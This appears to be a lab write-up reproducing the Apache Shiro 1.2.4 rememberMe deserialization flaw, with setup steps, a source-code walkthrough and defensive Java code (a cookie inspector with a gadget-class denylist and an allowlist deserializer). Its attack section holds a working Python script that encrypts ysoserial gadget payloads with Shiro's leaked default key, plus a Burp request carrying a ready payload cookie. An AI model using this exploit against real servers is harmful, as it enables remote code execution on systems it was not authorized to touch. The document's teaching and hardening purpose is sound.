Shiro RememberMe 1.2.4 Deserialization Vulnerability (SSV-92180)

1. Shiro runtime environment

Apache Shiro is a Java framework for authorization and security authentication.

Download: https://repo1.maven.org/maven2/org/apache/shiro/shiro-root/1.2.4/

Change the versions of jstl and commons-beanutils in pom.xml so the environment matches the versions the vulnerable setup needs (commons-beanutils 1.9.2 is what the CommonsBeanutils1 chain below depends on):

<dependency>
    <groupId>javax.servlet</groupId>
    <artifactId>jstl</artifactId>
    <version>1.2</version>
    <scope>provided</scope>
</dependency>
<dependency>
    <groupId>commons-beanutils</groupId>
    <artifactId>commons-beanutils</artifactId>
    <version>1.9.2</version>
    <exclusions>
        <exclusion>
            <groupId>commons-logging</groupId>
            <artifactId>commons-logging</artifactId>
        </exclusion>
    </exclusions>
</dependency>

Open the project in IDEA, which installs the dependencies automatically, and use IDEA to build samples-web-1.2.4.war.

Place the war in Tomcat's webapps directory and name it shiro.war.

Add the remote-debug options to apache-tomcat-7.0.104\bin\startup.bat so IDEA can attach later:

SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8788


Double-click startup.bat to start Tomcat. If it fails, it is probably picking up the Tomcat referenced in the system environment variables; removing that Tomcat entry from the system environment variables fixes it.

2. Attack

You need a DNS logging endpoint: use http://www.dnslog.cn/ or start one locally. Alternatively, use the pop-a-calculator approach by removing the comment markers from the relevant lines.

# Adapted from elsewhere; see References
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'URLDNS', command], stdout=subprocess.PIPE)
    #popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'CommonsBeanutils1', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme("yourdnslog.cn")
    # payload = encode_rememberme("calc.exe") #mac:open /Applications/Calculator.app
    print("rememberMe="+payload.decode())

List the gadget chains shipped with ysoserial:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar
     Payload             Authors                                Dependencies
     -------             -------                                ------------
     BeanShell1          @pwntester, @cschneider4711            bsh:2.0b5
     C3P0                @mbechler                              c3p0:0.9.5.2, mchange-commons-java:0.2.11
     Clojure             @JackOfMostTrades                      clojure:1.8.0
     CommonsBeanutils1   @frohoff                               commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
     CommonsCollections1 @frohoff                               commons-collections:3.1
     CommonsCollections2 @frohoff                               commons-collections4:4.0
     CommonsCollections3 @frohoff                               commons-collections:3.1
     CommonsCollections4 @frohoff                               commons-collections4:4.0
     CommonsCollections5 @matthias_kaiser, @jasinner            commons-collections:3.1
     CommonsCollections6 @matthias_kaiser                       commons-collections:3.1
     CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
     FileUpload1         @mbechler                              commons-fileupload:1.3.1, commons-io:2.4
     Groovy1             @frohoff                               groovy:2.3.9
     Hibernate1          @mbechler
     Hibernate2          @mbechler
     JBossInterceptors1  @matthias_kaiser                       javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     JRMPClient          @mbechler
     JRMPListener        @mbechler
     JSON1               @mbechler                              json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
     JavassistWeld1      @matthias_kaiser                       javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     Jdk7u21             @frohoff
     Jython1             @pwntester, @cschneider4711            jython-standalone:2.5.2
     MozillaRhino1       @matthias_kaiser                       js:1.7R2
     MozillaRhino2       @_tint0                                js:1.7R2
     Myfaces1            @mbechler
     Myfaces2            @mbechler
     ROME                @mbechler                              rome:1.0
     Spring1             @frohoff                               spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
     Spring2             @mbechler                              spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
     URLDNS              @gebl
     Vaadin1             @kai_ullrich                           vaadin-server:7.7.14, vaadin-shared:7.7.14
     Wicket1             @jacob-baines                          wicket-util:6.23.0, slf4j-api:1.6.4

Send the request with Burp Suite:

GET /samples-web-1.2.4/ HTTP/1.1
Host: 10.73.195.7:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: rememberMe=6NddOQxrQiSTDe6AeasbqzYjld5sj7SEHSgAQjaql20pXoxxOuTl13xO7gj49KQjhTMIKWAHxjQQUcc4DVHhynTuOw65lianxfS07Xx5mp76LdvyjPv0+VkzhZ/jRTex+ZvQeFjKMw9+8N9YXY2iVYZ/Xx3x8h/IQAPNiF9yaUNY3ExnCqpMJjj4/FG/AHkaLTdbT2ldtsOBs7g7jB9uNd/b6XOXvohpR3HvP1Vvurci5NT0TKTq+3ZXNoSio/iC77DHb8yKQfn3i5OBp9SRww/Idwi4a4udLSdvQiWd+xz+GQylgt0og76GmcbR0d9TGHk/tqEaxraruEu1+fKCVhZjJiYwebuM/2DDgRjVG6hOTdEahK/l96y+iB39+Www5+I8Kf7oz4H+sUzHDYinbg==
Upgrade-Insecure-Requests: 1
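A defender-side check for the cookie shown in the request above, added here as an example (it is not part of the original post and not Apache Shiro's code). It decrypts a rememberMe value with the leaked default key used by the script above, tests the result for the Java serialization stream magic, and scans it for class descriptors that appear on a small denylist drawn from the ysoserial table (java.net.URL for URLDNS, BeanComparator for CommonsBeanutils1, plus TemplatesImpl as the usual RCE sink). A cookie that decrypts under that key means the deployment is still running Shiro's hard-coded key; a denylist hit means it carries a known gadget carrier class. The class name RememberMeInspector, the denylist contents and the constructed sample in main are assumptions; the key value and the IV-prefixed AES-CBC-PKCS5 layout are the ones the script above uses. Only the JDK is required.

```java
import java.nio.charset.StandardCharsets;
import java.util.*;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class RememberMeInspector {
    // Shiro 1.2.4's hard-coded default key (the same value the script above uses).
    static final byte[] DEFAULT_KEY = Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
    static final byte[] STREAM_MAGIC = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05};
    static final byte TC_CLASSDESC = 0x72;
    // Assumed denylist: carrier classes of the URLDNS and CommonsBeanutils1 chains listed above.
    static final Set<String> DENYLIST = new HashSet<>(Arrays.asList(
        "java.net.URL",
        "org.apache.commons.beanutils.BeanComparator",
        "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"));

    /** Outcome for one cookie value. */
    public static final class Verdict {
        public final boolean defaultKey;    // true: the cookie decrypts under the leaked key
        public final List<String> classes;  // every class descriptor seen in the stream
        public final List<String> hits;     // the subset that is on the denylist
        Verdict(boolean d, List<String> c, List<String> h) { defaultKey = d; classes = c; hits = h; }
        @Override public String toString() {
            return "defaultKey=" + defaultKey + " classes=" + classes + " hits=" + hits;
        }
    }

    /** Shiro's layout is base64( IV(16) || AES-CBC-PKCS5(data) ). Returns null if it does not decrypt. */
    static byte[] tryDecrypt(String cookieValue) {
        try {
            byte[] raw = Base64.getDecoder().decode(cookieValue);
            if (raw.length < 32 || raw.length % 16 != 0) return null;
            Cipher c = Cipher.getInstance("AES/CBC/PKCS5Padding");
            c.init(Cipher.DECRYPT_MODE, new SecretKeySpec(DEFAULT_KEY, "AES"),
                   new IvParameterSpec(Arrays.copyOfRange(raw, 0, 16)));
            return c.doFinal(raw, 16, raw.length - 16);
        } catch (Exception e) {  // bad base64 or bad padding: not produced with this key
            return null;
        }
    }

    /** Collect TC_CLASSDESC names: byte 0x72, 2-byte big-endian length, then the class name. */
    static List<String> classNames(byte[] stream) {
        List<String> names = new ArrayList<>();
        for (int i = 4; i + 3 <= stream.length; i++) {
            if (stream[i] != TC_CLASSDESC) continue;
            int len = ((stream[i + 1] & 0xFF) << 8) | (stream[i + 2] & 0xFF);
            if (len == 0 || i + 3 + len > stream.length) continue;
            String name = new String(stream, i + 3, len, StandardCharsets.UTF_8);
            // Only keep things shaped like a fully qualified class name (cuts false hits on data bytes).
            if (name.matches("[A-Za-z_$][\\w$]*(\\.[A-Za-z_$][\\w$]*)+")) names.add(name);
        }
        return names;
    }

    public static Verdict inspect(String cookieValue) {
        byte[] plain = tryDecrypt(cookieValue);
        if (plain == null || plain.length < 4
                || !Arrays.equals(Arrays.copyOf(plain, 4), STREAM_MAGIC)) {
            return new Verdict(false, Collections.<String>emptyList(), Collections.<String>emptyList());
        }
        List<String> classes = classNames(plain);
        List<String> hits = new ArrayList<>();
        for (String name : classes) if (DENYLIST.contains(name)) hits.add(name);
        return new Verdict(true, classes, hits);
    }

    public static void main(String[] args) throws Exception {
        // Constructed demo input: a fake object stream (magic, TC_OBJECT, TC_CLASSDESC "java.net.URL")
        // encrypted under the default key, standing in for a captured cookie. It is not a working gadget.
        byte[] fake = concat(STREAM_MAGIC, new byte[]{0x73, TC_CLASSDESC, 0x00, 0x0C},
                             "java.net.URL".getBytes(StandardCharsets.UTF_8));
        byte[] iv = new byte[16];
        new java.security.SecureRandom().nextBytes(iv);
        Cipher c = Cipher.getInstance("AES/CBC/PKCS5Padding");
        c.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(DEFAULT_KEY, "AES"), new IvParameterSpec(iv));
        String cookie = Base64.getEncoder().encodeToString(concat(iv, c.doFinal(fake)));

        System.out.println(inspect(cookie));                                   // default key, denylist hit
        System.out.println(inspect("bm90IGEgc2hpcm8gY29va2llIGF0IGFsbA=="));  // arbitrary data, no decrypt
    }

    static byte[] concat(byte[]... parts) {
        int n = 0; for (byte[] p : parts) n += p.length;
        byte[] out = new byte[n]; int pos = 0;
        for (byte[] p : parts) { System.arraycopy(p, 0, out, pos, p.length); pos += p.length; }
        return out;
    }
}
```

Run it against the `rememberMe` value of any request your application issues: if `defaultKey` comes back true for a cookie the server itself set, the key in shiro.ini (or the `CookieRememberMeManager` bean) still has to be replaced. The descriptor scan is a heuristic suited to a WAF or log-replay check, not a substitute for fixing the key and filtering the sink.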

3. Debugging

Path: shiro-web-1.2.4\WEB-INF\lib\shiro-core-1.2.4.jar!\org\apache\shiro\mgt\AbstractRememberMeManager.class

    public PrincipalCollection getRememberedPrincipals(SubjectContext subjectContext) {
        PrincipalCollection principals = null;

        try {
            byte[] bytes = this.getRememberedSerializedIdentity(subjectContext);
            if (bytes != null && bytes.length > 0) {
                principals = this.convertBytesToPrincipals(bytes, subjectContext);
            }
        } catch (RuntimeException var4) {
            principals = this.onRememberedPrincipalFailure(var4, subjectContext);
        }

        return principals;
    }

Step into convertBytesToPrincipals, which performs the decryption:

    protected PrincipalCollection convertBytesToPrincipals(byte[] bytes, SubjectContext subjectContext) {
        if (this.getCipherService() != null) {
            bytes = this.decrypt(bytes);
        }
        return this.deserialize(bytes);
    }

The decrypt function:

    protected byte[] decrypt(byte[] encrypted) {
        byte[] serialized = encrypted;
        CipherService cipherService = this.getCipherService();
        if (cipherService != null) {
            ByteSource byteSource = cipherService.decrypt(encrypted, this.getDecryptionCipherKey());
            serialized = byteSource.getBytes();
        }
        return serialized;
    }

Then the bytes are deserialized:

protected PrincipalCollection deserialize(byte[] serializedIdentity) {
    return (PrincipalCollection)this.getSerializer().deserialize(serializedIdentity);
}

which calls readObject:

    public T deserialize(byte[] serialized) throws SerializationException {
        if (serialized == null) {
            String msg = "argument cannot be null.";
            throw new IllegalArgumentException(msg);
        } else {
            ByteArrayInputStream bais = new ByteArrayInputStream(serialized);
            BufferedInputStream bis = new BufferedInputStream(bais);

            try {
                ObjectInputStream ois = new ClassResolvingObjectInputStream(bis);
                T deserialized = ois.readObject();
                ois.close();
                return deserialized;
            } catch (Exception var6) {
                String msg = "Unable to deserialze argument byte array.";
                throw new SerializationException(msg, var6);
            }
        }
    }
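The chain above ends in readObject() on whatever class the stream names: ClassResolvingObjectInputStream resolves any class, so once an attacker holds the key (the fixed default here) the gadget classes on the classpath become reachable. The following is an added hardening example, not Shiro's code: a hardened counterpart of deserialize(byte[]) whose ObjectInputStream only resolves classes on an explicit allowlist, so a correctly encrypted payload still cannot instantiate a gadget class. The allowlist contents are an assumption about what a rememberMe identity legitimately contains (Shiro's real principal type is org.apache.shiro.subject.SimplePrincipalCollection); the class names AllowlistDeserializer and AllowlistObjectInputStream and the sample identities in main are constructed for the demo and use only the JDK.

```java
import java.io.*;
import java.util.*;

public class AllowlistDeserializer {
    // Assumed allowlist: every class descriptor in a rememberMe stream, superclasses included,
    // must be listed. Extend it with your own principal classes and nothing else.
    static final Set<String> ALLOWED = new HashSet<>(Arrays.asList(
        "org.apache.shiro.subject.SimplePrincipalCollection",
        "java.util.ArrayList",
        "java.lang.String", "java.lang.Number", "java.lang.Integer", "java.lang.Long"));

    /** Like Shiro's ClassResolvingObjectInputStream, but refuses anything not on the allowlist. */
    static final class AllowlistObjectInputStream extends ObjectInputStream {
        AllowlistObjectInputStream(InputStream in) throws IOException { super(in); }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc)
                throws IOException, ClassNotFoundException {
            // resolveClass runs before any field of the object is read, so a gadget class is
            // rejected before its readObject() or any hashCode()/compare() callback can run.
            if (!ALLOWED.contains(desc.getName())) {
                throw new InvalidClassException(desc.getName(), "class not on the rememberMe allowlist");
            }
            return super.resolveClass(desc);
        }
    }

    /** Hardened counterpart of the deserialize(byte[]) shown above: same shape, filtered resolution. */
    public static Object deserialize(byte[] serialized) throws IOException, ClassNotFoundException {
        if (serialized == null) throw new IllegalArgumentException("argument cannot be null.");
        try (ObjectInputStream ois = new AllowlistObjectInputStream(
                 new BufferedInputStream(new ByteArrayInputStream(serialized)))) {
            return ois.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample identities for the demo (not real Shiro principals).
        List<String> legitimate = new ArrayList<>(Arrays.asList("alice", "ROLE_USER"));
        Map<String, String> offList = new HashMap<>();  // HashMap is the carrier of the URLDNS chain above
        offList.put("k", "v");

        System.out.println("accepted: " + deserialize(serialize(legitimate)));
        try {
            deserialize(serialize(offList));
            System.out.println("unexpected: HashMap was accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

On Java 9 and later the same policy can be expressed with ObjectInputFilter (ObjectInputStream.setObjectInputFilter) instead of overriding resolveClass. Shiro's own fix for this issue, shipped in 1.2.5, was to stop using the fixed default key and generate a random one per instance; filtering the sink is the complementary control that still holds if a key is ever disclosed.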

References:

https://www.seebug.org/vuldb/ssvid-92180
